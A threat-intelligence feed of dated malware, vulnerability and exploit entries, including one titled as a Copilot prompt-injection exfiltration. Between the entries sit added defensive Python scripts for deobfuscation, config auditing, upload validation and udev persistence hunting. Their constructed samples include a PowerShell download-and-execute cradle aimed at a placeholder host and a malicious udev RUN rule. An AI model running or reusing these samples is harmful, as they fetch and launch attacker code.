
DATE

NAME

CATEGORY

SUBCATEGORY

INFO

31.8.24

AA24-242A #StopRansomware: RansomHub Ransomware

REPORT

Ransomware

#StopRansomware: RansomHub Ransomware

31.8.24

Insecure Platform Key (PK) used in UEFI system firmware signature

ALERT

ALERT

A vulnerability in the use of hard-coded Platform Keys (PK) within the UEFI framework, known as PKfail, has been discovered.
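A practical check for the PKfail entry above: the script below parses the raw PK variable (one or more EFI_SIGNATURE_LIST structures) and reports whether the embedded certificate carries the "DO NOT TRUST" marker that the leaked vendor test keys are known for. This is an added example, not code from the page or from any vendor advisory. The efivarfs path, the 4-byte attribute prefix that efivarfs prepends, and the marker strings are my assumptions; the two sample payloads are constructed placeholders, not real certificates.

```python
"""Parse a UEFI Platform Key (PK) variable and flag known untrusted test keys.

Added example, not from the original page. Assumptions: on Linux the PK variable
is exposed at PK_EFIVAR with a 4-byte attribute word before the EFI_SIGNATURE_LIST
data, and the PKfail test certificates carry "DO NOT TRUST" in their subject.
"""
import struct
import uuid

EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
PK_EFIVAR = "/sys/firmware/efi/efivars/PK-8be4df61-93ca-11d2-aa0d-00e098032b8c"
UNTRUSTED_MARKERS = (b"DO NOT TRUST", b"DO NOT SHIP")  # assumed marker strings


def parse_signature_lists(blob: bytes):
    """Return [(signature_type_guid, owner_guid, signature_data), ...] for every
    EFI_SIGNATURE_DATA entry in a concatenation of EFI_SIGNATURE_LISTs."""
    entries, off = [], 0
    while off + 28 <= len(blob):
        sig_type = uuid.UUID(bytes_le=blob[off:off + 16])
        list_size, hdr_size, sig_size = struct.unpack_from("<III", blob, off + 16)
        if list_size < 28 or off + list_size > len(blob) or sig_size < 16:
            raise ValueError("malformed EFI_SIGNATURE_LIST at offset %d" % off)
        pos, end = off + 28 + hdr_size, off + list_size
        while pos + sig_size <= end:
            owner = uuid.UUID(bytes_le=blob[pos:pos + 16])
            entries.append((sig_type, owner, blob[pos + 16:pos + sig_size]))
            pos += sig_size
        off = end
    return entries


def check_pk(blob: bytes):
    """Return human-readable findings for a PK variable payload (empty = nothing found)."""
    findings = []
    for sig_type, owner, data in parse_signature_lists(blob):
        if sig_type != EFI_CERT_X509_GUID:
            findings.append("non-X.509 entry of type %s" % sig_type)
            continue
        hit = next((m.decode() for m in UNTRUSTED_MARKERS if m in data), None)
        if hit:
            findings.append("PK certificate (owner %s) contains '%s': likely PKfail test key" % (owner, hit))
    return findings


def build_siglist(cert_der: bytes, owner=uuid.UUID(int=0)) -> bytes:
    """Build one EFI_SIGNATURE_LIST holding a single X.509 entry (used for the samples)."""
    sig = owner.bytes_le + cert_der
    header = EFI_CERT_X509_GUID.bytes_le + struct.pack("<III", 28 + len(sig), 0, len(sig))
    return header + sig


# Constructed samples: a DER-looking prefix plus a subject string, not real certificates.
SAMPLE_BAD_PK = build_siglist(b"\x30\x82\x01\x00" + b"CN=DO NOT TRUST - AMI Test PK" + b"\x00" * 32)
SAMPLE_GOOD_PK = build_siglist(b"\x30\x82\x01\x00" + b"CN=Example OEM Platform Key" + b"\x00" * 32)

if __name__ == "__main__":
    with open(PK_EFIVAR, "rb") as f:
        payload = f.read()[4:]  # skip the efivarfs attribute word
    for line in check_pk(payload) or ["no known test-key markers in PK"]:
        print(line)
```

A substring match on the DER is deliberately crude: it needs no crypto library and still catches the marker, but a proper inventory should also compare the certificate hash against the published list of affected keys.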

31.8.24

NoteMark < 0.13.0 - Stored XSS

Exploit

WebApps

Multiple

31.8.24

Gitea 1.22.0 - Stored XSS

Exploit

WebApps

Multiple

31.8.24

Invesalius3 - Remote Code Execution

Exploit

WebApps

Python

31.8.24

Windows TCP/IP - RCE Checker and Denial of Service

Exploit

DoS

Windows

31.8.24

2024-08-30 - Approximately 11 days of server scans and probes

MALWARE TRAFFIC

MALWARE TRAFFIC

Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

31.8.24

2024-08-29 - Phishing email and traffic to fake webmail login page

MALWARE TRAFFIC

MALWARE TRAFFIC

Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

31.8.24

2024-08-26 - GuLoader for Remcos RAT

MALWARE TRAFFIC

MALWARE TRAFFIC

Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

31.8.24

2024-08-12 - XLoader/Formbook infection

MALWARE TRAFFIC

MALWARE TRAFFIC

Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website.

31.8.24

Corona Mirai variant distributed via vulnerability exploitation

ALERTS

BOTNET

A Mirai malware variant dubbed Corona has recently been distributed via exploitation of a command injection vulnerability (CVE-2024-7029) in AVTECH IP camera devices. The botnet also attempts to exploit older vulnerabilities, including CVE-2017-17215 in Huawei routers and CVE-2014-8361 affecting Realtek.

31.8.24

LummaC2 Stealer variant spread via PowerShell execution

ALERTS

VIRUS

The LummaC2 infostealer has been reported as being distributed in a recent campaign leveraging obfuscated PowerShell commands. LummaC2 is a C-based infostealing malware often sold under the Malware-as-a-Service (MaaS) model. Its primary functionality is to steal confidential data from infected endpoints and exfiltrate it to C2 servers controlled by the attackers.
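For the obfuscated-PowerShell delivery described above, the first triage step is to peel the encoding layers off the launcher before looking for the download cradle. The script below does that for the three encodings most launchers use: the -EncodedCommand switch (Base64 of UTF-16LE text), nested [Convert]::FromBase64String('...') literals, and strings split with '+'. It is an added example, not code from the page or from any vendor report; the sample command line is constructed and the URL in it is a placeholder.

```python
"""Unwrap an obfuscated PowerShell launcher of the kind used to drop LummaC2.

Added example (not from the page or any vendor report). The command line at the
bottom is constructed; no real C2 or payload is referenced.
"""
import base64
import binascii
import re
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (and -e/-ec).
# The prefixes are enumerated instead of using -e\w* so that "-ExecutionPolicy Bypass"
# is never mistaken for a Base64 payload.
ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc\w*)\s+([A-Za-z0-9+/=]{8,})", re.I)
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
CONCAT = re.compile(r"['\"]\s*\+\s*['\"]")  # 'ab'+'cd' -> 'abcd'


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent or not valid Base64."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def join_concatenations(script: str) -> str:
    """Merge 'ht'+'tp' style fragments so URLs and cmdlet names become searchable."""
    return CONCAT.sub("", script)


def unwrap(cmdline: str, max_depth: int = 5) -> List[str]:
    """Return the decoded layers, outermost first, stopping when no Base64 literal remains."""
    layers = []
    current = decode_encoded_command(cmdline) or cmdline
    for _ in range(max_depth):
        current = join_concatenations(current)
        layers.append(current)
        blobs = B64_LITERAL.findall(current)
        if not blobs:
            break
        decoded = []
        for blob in blobs:
            raw = base64.b64decode(blob)
            # UTF-16LE text has a NUL in every second byte; otherwise assume UTF-8
            encoding = "utf-16-le" if b"\x00" in raw[:4] else "utf-8"
            decoded.append(raw.decode(encoding, errors="replace"))
        current = "\n".join(decoded)
    return layers


# Constructed sample: a download cradle hidden behind concatenation, then Base64, then -enc
INNER = "IEX (New-Object Net.WebClient).DownloadString('ht'+'tp://'+'example.invalid/p.ps1')"
STAGE1 = ("$x=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('%s'));IEX $x"
          % base64.b64encode(INNER.encode()).decode())
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(STAGE1.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(SAMPLE_CMDLINE)):
        print(f"--- layer {depth} ---\n{layer}")
```

Real launchers add more tricks (format-string reordering, Deflate streams, character-code arrays), so treat the last layer this returns as a starting point for manual review rather than the final payload.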

31.8.24

Middle East targeted by malware using fake Palo Alto VPN

ALERTS

VIRUS

A malware campaign targeting organizations in the Middle East has been reported, where attackers use a fake Palo Alto GlobalProtect VPN client to deceive users. This malware employs advanced techniques, including a cleverly disguised command-and-control (C2) infrastructure and tools like Interactsh to communicate with specific hostnames and monitor infection progress. It can execute PowerShell commands, manage processes, and encrypt data.

31.8.24

ALERTS

VIRUS

X-FILES is a stealer malware written in C that is actively advertised on underground forums, with ongoing enhancements. Like many other infostealers, it aims to steal and exfiltrate sensitive information from infected systems including browser data, cookies, passwords, autofill data, credit card information, and cryptocurrency wallet details.

31.8.24

CVE-2024-38653 - XXE vulnerability in Ivanti Avalanche

ALERTS

VULNERABILITY

CVE-2024-38653 is a high-severity (CVSS score 7.5) XML External Entity (XXE) vulnerability affecting SmartDeviceServer in Ivanti Avalanche, an enterprise endpoint management solution that allows for centralized device management within an organization.

31.8.24

Iranian threat actor Elfin deploys 'Tickler' backdoor

ALERTS

VIRUS

Iranian threat actor Elfin (aka APT33, Peach Sandstorm) has been observed deploying a new custom multi-stage backdoor dubbed Tickler. This malware has targeted government, defense, satellite, and oil and gas sectors in the U.S. and the United Arab Emirates (UAE).

31.8.24

Phishing campaign targets Japan Labor Union Workers

ALERTS

PHISHING

A phishing campaign targeting Japanese workers affiliated with labor unions has been observed. The e-crime actor is impersonating 労働金庫 (Rōdō Kinko), commonly known as Rokin, and the 全国労働金庫協会 (National Association of Labour Banks or Zenkoku Rōdō Kinko Kyōkai), which are part of Japan's unique financial system designed to serve the financial needs of workers.

30.8.24

Voldemort

CAMPAIGN

CAMPAIGN

The Malware That Must Not Be Named: Suspected Espionage Campaign Delivers “Voldemort”

30.8.24

GreenCharlie

APT

GROUP

GreenCharlie Infrastructure Targeting US Political Entities with Advanced Phishing and Malware

30.8.24

Masquerades

MALWARE

Backdoor

Threat Actors Target the Middle East Using Fake Palo Alto GlobalProtect Tool

30.8.24

Malicious npm Packages

HACKING

Malware

North Korea Still Attacking Developers via npm

30.8.24

SLOW#TEMPEST

CAMPAIGN

APT

From Cobalt Strike to Mimikatz: A Deep Dive into the SLOW#TEMPEST Campaign Targeting Chinese Users

30.8.24

CVE-2023-22527

VULNERABILITY

CVE

Cryptojacking via CVE-2023-22527: Dissecting a Full-Scale Cryptomining Ecosystem

30.8.24

noMu Backdoor

MALWARE

Backdoor

APT Attack Case Analysis Report Using noMu Backdoor

30.8.24

APT32

APT

APT

Advanced Persistent Threat Targeting Vietnamese Human Rights Defenders

30.8.24

APT29

APT

APT

State-backed attackers and commercial surveillance vendors repeatedly use the same exploits

30.8.24

CVE-2023-41993

VULNERABILITY

CVE

A WebKit flaw that could result in arbitrary code execution when processing specially crafted web content (fixed by Apple in iOS 16.7 and Safari 16.6.1 in September 2023)

30.8.24

CVE-2024-4671

VULNERABILITY

CVE

A use-after-free flaw in Chrome's Visuals component that could result in arbitrary code execution (fixed by Google in Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux in May 2024)

30.8.24

CVE-2024-5274

VULNERABILITY

CVE

A type confusion flaw in the V8 JavaScript and WebAssembly engine that could result in arbitrary code execution (fixed by Google in Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux in May 2024)

29.8.24

A new Snake Keylogger variant

ALERTS

VIRUS

A new Snake Keylogger malware variant has been reported by researchers from Fortinet. The malware is spread via phishing in the form of malicious .xls attachments. The distributed Excel files contain an exploit for an old Microsoft Office/WordPad RTF vulnerability, CVE-2017-0199. The attackers also leverage .hta files, VBScript and PowerShell code within the attack chain of this campaign.

29.8.24

Advanced dropper distributes 'Angry Stealer' infostealer via Telegram

ALERTS

VIRUS

An advanced dropper binary has been identified, designed to deploy an information stealer known as 'Angry Stealer,' which is actively promoted on Telegram and other online platforms. Angry Stealer targets sensitive data such as browser information, cryptocurrency wallets, VPN credentials, and system details, exfiltrating this data via Telegram.

29.8.24

Godzilla webshell deployment campaign

ALERTS

CAMPAIGN

A new Godzilla webshell deployment campaign has been reported in the wild. The attackers are targeting organizations running ASP.NET instances with vulnerable environment settings and abuse the ViewState mechanism to deliver malicious webshells into the victim's environment.
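The "vulnerable environment settings" that make ViewState a webshell delivery channel live in web.config: a disabled ViewState MAC, or a machineKey the attacker has obtained, lets them submit a ViewState that the server deserializes and executes. The audit script below is an added example (not code from the page or from any vendor) that flags those settings; the two configurations it checks are constructed, one weak and one hardened.

```python
"""Audit an ASP.NET web.config for ViewState settings that enable deserialization attacks.

Added example, not from the page. Constructed configs below; the attribute names are
the real ASP.NET ones, the key values are placeholders.
"""
import xml.etree.ElementTree as ET

WEAK_VALIDATION = {"md5", "sha1", "3des", "aes"}  # HMACSHA256 or stronger is expected


def audit_web_config(xml_text: str):
    """Return a list of findings; an empty list means nothing to report."""
    root = ET.fromstring(xml_text)
    findings = []
    for pages in root.iter("pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append("pages/@enableViewStateMac=false: ViewState accepted without a MAC")
        if pages.get("viewStateEncryptionMode", "Auto").lower() == "never":
            findings.append("pages/@viewStateEncryptionMode=Never: ViewState sent in cleartext")
    for mk in root.iter("machineKey"):
        for attr in ("validationKey", "decryptionKey"):
            if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(f"machineKey/@{attr} is static: anyone holding this config can forge ViewState")
        if mk.get("validation", "HMACSHA256").lower() in WEAK_VALIDATION:
            findings.append(f"machineKey/@validation={mk.get('validation')} is weak")
    return findings


# Constructed: the weak configuration
VULNERABLE_CONFIG = """<configuration>
  <system.web>
    <pages enableViewStateMac="false" viewStateEncryptionMode="Never" />
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

# Constructed: the hardened configuration
HARDENED_CONFIG = """<configuration>
  <system.web>
    <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_web_config(cfg) or ["OK"])
```

Two caveats: since .NET Framework 4.5.2 the runtime enforces the ViewState MAC regardless of enableViewStateMac, so on current versions the realistic exposure is a leaked or default machineKey rather than a disabled MAC; and web farms need a shared static key, so the static-key finding means "protect and rotate", not "remove".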

29.8.24

Czech Republic officials hit by malware campaign using NATO-themed lures

ALERTS

VIRUS

A malware campaign targeting government and military officials in the Czech Republic has been reported. The threat actor behind this operation is believed to have Russian origins and heavily relied on open-source offensive tools.

29.8.24

Critical vulnerability CVE-2023-22527 exploited for cryptomining activities

ALERTS

VULNERABILITY

According to reports, the critical vulnerability CVE-2023-22527 is actively being exploited in the wild. This vulnerability is a severe OGNL injection flaw in Atlassian Confluence Data Center and Server. Threat actors are exploiting it for cryptojacking, transforming compromised systems into cryptomining networks. The attack vector includes deploying shell scripts and XMRig miners while maintaining persistence through cron jobs.

29.8.24

US voters targeted in phishing campaign

ALERTS

PHISHING

With the US Presidential Election just a few months away and the press reporting allegations of cyber intrusions affecting the campaigns, we reviewed new domains registered between 1 May and 12 August 2024 containing strings "harris", "walz", or "trump" in the domain. Domains with "vance" in them were excluded due to that string being found in many English words and domains unrelated to the election.

29.8.24

Rocinante mobile malware

ALERTS

VIRUS

Rocinante is a malware variant observed prevalently in campaigns targeted at mobile users in Brazil. Functionality-wise, Rocinante has the ability to steal information via keylogging, initiate remote access sessions, and simulate swipe movements or touch events on the infected device. The malware might also be leveraged for phishing attacks by displaying bogus login websites, targeting the theft of banking credentials.

29.8.24

Emerging loader Emmental spreads malware via disguised binaries

ALERTS

VIRUS

A loader called Emmental has been detected in use, being distributed in disguised Windows binaries since February 2024. This loader employs HTA files and utilizes traditional email phishing tactics, including fake videos, to target organizations worldwide. It has been part of several campaigns globally using the Bunny.net CDN provider and WebDAV servers to distribute various malware payloads, such as CryptBot, AsyncRAT, Lumma, Meduza stealer, Xworm, and SectopRAT. The functionality of this tool matches the capabilities advertised in underground markets.

29.8.24

New macOS variant of the HZ RAT backdoor emerges

ALERTS

VIRUS

A new macOS variant of the HZ RAT backdoor has been discovered in the wild. According to recent reports, the malware is targeting users of the enterprise messenger DingTalk and the messaging platform WeChat.

29.8.24

AA24-241A Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations

REPORT

REPORT

Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations

29.8.24

CVE-2024-7029

VULNERABILITY

CVE

Commands can be injected over the network and executed without authentication.

29.8.24

Fortra FileCatalyst Workflow Static HSQLDB Password

VULNERABILITY

CVE

Fortra FileCatalyst Workflow contains a static HSQLDB password that can be used by a remote attacker to access the service with administrative access.

28.8.24

CVE-2024-38856

VULNERABILITY

CVE

Apache OFBiz Incorrect Authorization Vulnerability

28.8.24

CVE-2024-6386

VULNERABILITY

CVE

The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via Twig Server-Side Template Injection.

28.8.24

HZ Rat

MALWARE

MacOS

HZ Rat backdoor for macOS attacks users of China’s DingTalk and WeChat

27.8.24

Versa Director Zero-Day Exploitation

VULNERABILITY

Zero-Day

Taking the Crossroads: The Versa Director Zero-Day Exploitation

27.8.24

Phishing campaign targeting users in Asia Pacific regions

ALERTS

CAMPAIGN

Symantec has recently observed a phishing campaign targeting users in Asia Pacific regions. This campaign utilizes HTML files that post the ill-gotten credentials to 3rd party hosting services, in this case nocodeform[.]io. The messages are delivered from either a 'postmaster' or 'MAILER-DAEMON' address in an effort to obscure themselves.

27.8.24

SVG-Based Phishing Campaign Hits LATAM Industries Email Credentials

ALERTS

CAMPAIGN

In early August, Symantec observed an actor targeting multiple companies in Latin America across the retail, legal, dairy, finance, energy, and automobile manufacturing sectors. The goal was to collect email credentials, which are likely to fuel the initial access broker markets and lead to further compromises with varying impacts, including financial theft, cyber espionage, and ransomware attacks.

27.8.24

Phishing campaign targets VPN users with Cheana Infostealer malware

ALERTS

CAMPAIGN

A phishing campaign targeting users downloading VPN software has been reported. As part of the campaign, a phishing site masquerading as a WarpVPN provider is hosted to distribute stealer malware for different operating system platforms. The malware, dubbed Cheana Stealer, collects and exfiltrates various types of information such as in-browser stored data, cookies, passwords, cryptocurrency wallets, and cryptocurrency browser extensions. The Linux and macOS versions have the additional capability of stealing SSH keys and Keychain data.

27.8.24

Dolphin Loader: The new malware-as-a-service threat exploiting RMM tools

ALERTS

VIRUS

Dolphin Loader is a new Malware-as-a-Service (MaaS) loader that was first observed in July 2024 being sold on Telegram. It is used to distribute various malware payloads, such as SectopRAT, LummaC2, and Redline, primarily through drive-by downloads.

27.8.24

Attackers Spreading Malware via Infected Websites

ALERTS

VIRUS

Researchers have discovered malware that spreads by disguising itself as a browser update on infected websites. When users visit these sites, they are prompted to download a malicious file posing as a browser update for Chrome or Firefox. These files can be in various formats like EXE, ZIP, APPX, or VHD. The VHD file contains a hidden shortcut (LNK) that executes PowerShell commands and connects to the attacker's C2 server.

27.8.24

SpyNote Variant Lurks In South Africa Impersonating Two Major Banks

ALERTS

VIRUS

Symantec has recently identified a variant of the SpyNote Android Remote Access Trojan in South Africa's mobile threat landscape. A threat actor is impersonating two major financial institutions, Nedbank and Absa, in an attempt to lure users into installing the malware on their devices, leading to financial losses due to unauthorized transactions, identity theft, and the compromise of sensitive personal information.

27.8.24

Cthulhu Stealer

ALERTS

VIRUS

Researchers have recently observed another malware-as-a-service (MaaS) that targets Mac users, dubbed Cthulhu. This malware is written in Go and delivered as a disk image (DMG) with platform-specific binaries. It masquerades as legitimate software to trick users into opening the DMG, then uses macOS's 'osascript' tool to prompt for their password and gain unauthorized access.

27.8.24

CVE-2024-0519

VULNERABILITY

CVE

Out-of-bounds memory access in V8

27.8.24

CVE-2024-2886

VULNERABILITY

CVE

Use-after-free in WebCodecs (demonstrated at Pwn2Own 2024)

27.8.24

CVE-2024-2887

VULNERABILITY

CVE

Type confusion in WebAssembly (demonstrated at Pwn2Own 2024)

27.8.24

CVE-2024-3159

VULNERABILITY

CVE

Out-of-bounds memory access in V8 (demonstrated at Pwn2Own 2024)

27.8.24

CVE-2024-4671

VULNERABILITY

CVE

Use-after-free in Visuals

27.8.24

CVE-2024-4761

VULNERABILITY

CVE

Out-of-bounds write in V8

27.8.24

CVE-2024-4947

VULNERABILITY

CVE

Type confusion in V8

27.8.24

CVE-2024-5274

VULNERABILITY

CVE

Type confusion in V8

27.8.24

CVE-2024-7971

VULNERABILITY

CVE

Type confusion in V8

27.8.24

CVE-2024-39717

VULNERABILITY

CVE

The Versa Director GUI provides an option to customize the look and feel of the user interface. This option is only available to a user logged in with the Provider-Data-Center-Admin or Provider-Data-Center-System-Admin role (tenant-level users do not have this privilege). The "Change Favicon" (Favorite Icon) option can be misused to upload a malicious file with a .png extension that masquerades as an image file.

27.8.24

Microsoft 365 Copilot And Prompt Injections

VULNERABILITY

AI

Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information

27.8.24

CVE-2024-40766

VULNERABILITY

CVE

SonicOS Improper Access Control Vulnerability

26.8.24

CVE-2024-27132

VULNERABILITY

CVE

Cross-site Scripting in MLFlow

26.8.24

CVE-2024-31214

VULNERABILITY

CVE

(CVSS score: 9.7) - Unrestricted file upload vulnerability in device image upload could lead to remote code execution

26.8.24

CVE-2024-24809

VULNERABILITY

CVE

(CVSS score: 8.5) - Path Traversal: 'dir/../../filename' and unrestricted upload of file with dangerous type
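The Versa Director favicon entry (CVE-2024-39717) and the two upload CVEs just above (CVE-2024-31214, CVE-2024-24809) are the same two handler mistakes: trusting the file extension instead of the content, and building the destination path from a user-supplied name. The handler below is an added example, not code from any of those products; it validates a PNG by its signature and chunk structure (rejecting trailing bytes, so an appended payload also fails) and resolves the target path before checking it stays inside the upload directory. The sample files are constructed.

```python
"""Content-based PNG validation plus traversal-safe path resolution for an upload handler.

Added example, not from any vendor's code. GOOD_PNG is a constructed 1x1 image;
FAKE_PNG is a constructed PE-style blob that an attacker would upload as ".png".
"""
import os
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def is_valid_png(data: bytes) -> bool:
    """True only for a well-formed PNG: signature, CRC-correct chunks, IHDR first,
    IEND last, and nothing after IEND."""
    if not data.startswith(PNG_SIG):
        return False
    pos, first, last = len(PNG_SIG), None, None
    while pos + 12 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        body = data[pos + 8:pos + 8 + length]
        if len(body) != length:
            return False
        (crc,) = struct.unpack_from(">I", data, pos + 8 + length)
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            return False  # corrupt or hand-crafted chunk
        first = first or ctype
        last = ctype
        pos += 12 + length
    return pos == len(data) and first == b"IHDR" and last == b"IEND"


def safe_target_path(upload_dir: str, user_name: str) -> str:
    """Resolve user_name under upload_dir; raise if the result escapes the directory."""
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, user_name))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path traversal attempt: {user_name!r}")
    return target


def accept_upload(upload_dir: str, user_name: str, data: bytes) -> str:
    """Return the path the file may be written to, or raise ValueError."""
    if not user_name.lower().endswith(".png") or not is_valid_png(data):
        raise ValueError("only well-formed PNG files are accepted")
    return safe_target_path(upload_dir, user_name)


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk (length, type, data, CRC) for the constructed sample."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)


GOOD_PNG = (PNG_SIG
            + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
            + _chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00"))
            + _chunk(b"IEND", b""))
FAKE_PNG = b"MZ\x90\x00" + b"\x00" * 60 + b"this is not an image"

if __name__ == "__main__":
    for name, blob in (("favicon.png", GOOD_PNG), ("shell.png", FAKE_PNG), ("../../etc/x.png", GOOD_PNG)):
        try:
            print(name, "->", accept_upload("/var/www/uploads", name, blob))
        except ValueError as e:
            print(name, "-> rejected:", e)
```

Checking the chunk CRCs is what defeats the usual polyglot trick of a valid-looking header followed by script or executable content; checking the resolved path (after symlinks) rather than the literal string is what defeats "dir/../../filename" and its encoded variants.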

26.8.24

NGate

MALWARE

Android

NGate Android malware relays NFC traffic to steal cash

25.8.24

Aurba 501 - Authenticated RCE

Exploit

WebApps

Linux

25.8.24

HughesNet HT2000W Satellite Modem - Password Reset

Exploit

WebApps

Hardware

25.8.24

Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure

Exploit

WebApps

Hardware

25.8.24

Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass

Exploit

WebApps

Hardware

25.8.24

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config

Exploit

WebApps

Hardware

25.8.24

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass

Exploit

WebApps

Hardware

25.8.24

Helpdeskz v2.0.2 - Stored XSS

Exploit

WebApps

PHP

25.8.24

Calibre-web 0.6.21 - Stored XSS

Exploit

WebApps

Multiple

25.8.24

sedexp

MALWARE

Linux

Unveiling "sedexp": A Stealthy Linux Malware Exploiting udev Rules

24.8.24

CVE-2021-33044

VULNERABILITY

CVE

(CVSS score: 9.8) - Dahua IP Camera Authentication Bypass Vulnerability

24.8.24

CVE-2021-33045

VULNERABILITY

CVE

(CVSS score: 9.8) - Dahua IP Camera Authentication Bypass Vulnerability

24.8.24

CVE-2021-31196

VULNERABILITY

CVE

(CVSS score: 7.2) - Microsoft Exchange Server Information Disclosure Vulnerability

24.8.24

CVE-2022-0185

VULNERABILITY

CVE

(CVSS score: 8.4) - Linux Kernel Heap-Based Buffer Overflow Vulnerability

24.8.24

Peaklight downloader malware activity reported

ALERTS

VIRUS

Peaklight is a new PowerShell-based downloader variant identified by researchers from Mandiant. The malware has been used in recent campaigns distributing various payloads including Lumma infostealer, ShadowLadder and CryptBot. The attackers leverage malicious .lnk files disguised as video files as well as JavaScript droppers within the multi-staged attack chain.

24.8.24

CVE-2024-4885 - Progress Software WhatsUp Gold RCE vulnerability

ALERTS

VULNERABILITY

CVE-2024-4885 is a recently disclosed critical (CVSS score 9.8) unauthenticated remote code execution vulnerability affecting Progress Software WhatsUp Gold, a network monitoring product. Exploitation of the bug might allow unauthenticated attackers to execute arbitrary commands with iisapppool/nmconsole privileges.

24.8.24

Sedexp Linux malware uses udev rules for persistence

ALERTS

VIRUS

Sedexp is a recently identified threat affecting Linux environments. Sedexp malware has been reported to leverage udev rules for the purpose of establishing persistence on the infected machine. Udev is the device manager on Linux that handles the device nodes in the /dev directory.
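Hunting for the udev persistence described above is a matter of reading every rules file and asking which ones execute something. The scanner below is an added example, not code from the page or the vendor report: it extracts the RUN, PROGRAM and IMPORT{program} keys from each rule, and flags commands that run from writable directories or through a shell, or that trigger on a device present at every boot such as /dev/random (major 1, minor 8). The two rule files are constructed; the "asedexpb" name and path are assumptions used only to make the sample look like a hit.

```python
"""Scan udev rule files for attacker-added RUN/PROGRAM keys (sedexp-style persistence).

Added example, not from the vendor report. The rule texts below are constructed;
the binary name and path in the malicious sample are assumptions.
"""
import glob
import re
from typing import Dict, List

EXEC_KEYS = re.compile(r'(RUN|PROGRAM|IMPORT\{program\})\s*\+?=\s*"([^"]*)"')
RULE_DIRS = ("/etc/udev/rules.d/", "/run/udev/rules.d/", "/lib/udev/rules.d/", "/usr/lib/udev/rules.d/")
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/", "/root/", "/run/user/", "/.")
SHELL_WRAPPERS = ("/bin/sh", "/bin/bash", "sh -c", "bash -c")


def scan_udev_rules(files: Dict[str, str]) -> List[str]:
    """files maps path -> contents. Returns one finding per suspicious exec key."""
    findings = []
    for path, text in files.items():
        if not path.startswith(RULE_DIRS):
            findings.append(f"{path}: rule file outside the standard rules.d directories")
        for lineno, line in enumerate(text.splitlines(), 1):
            if not line.strip() or line.lstrip().startswith("#"):
                continue
            for key, cmd in EXEC_KEYS.findall(line):
                reasons = []
                if any(d in cmd for d in SUSPICIOUS_DIRS):
                    reasons.append("executes from a writable, user or hidden directory")
                if any(w in cmd for w in SHELL_WRAPPERS):
                    reasons.append("wraps a shell command")
                if 'ENV{MAJOR}=="1"' in line and 'ENV{MINOR}=="8"' in line:
                    reasons.append("triggers on /dev/random, a device present at every boot")
                if reasons:
                    findings.append(f"{path}:{lineno} {key}={cmd!r}: " + "; ".join(reasons))
    return findings


def load_live_rules() -> Dict[str, str]:
    """Read every *.rules file from the standard directories on this host."""
    live = {}
    for d in RULE_DIRS:
        for p in glob.glob(d + "*.rules"):
            with open(p, errors="replace") as fh:
                live[p] = fh.read()
    return live


# Constructed sample rule files: one malicious, one a typical distribution rule.
SAMPLE_RULES = {
    "/etc/udev/rules.d/99-hide-me.rules":
        'ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c \'/tmp/.x/asedexpb run:+\'"\n',
    "/lib/udev/rules.d/60-persistent-storage.rules":
        "# legitimate distribution rule\n"
        'KERNEL=="sd*", IMPORT{program}="scsi_id --export --whitelisted -d $devnode"\n',
}

if __name__ == "__main__":
    print("\n".join(scan_udev_rules(load_live_rules())) or "no suspicious udev rules")
```

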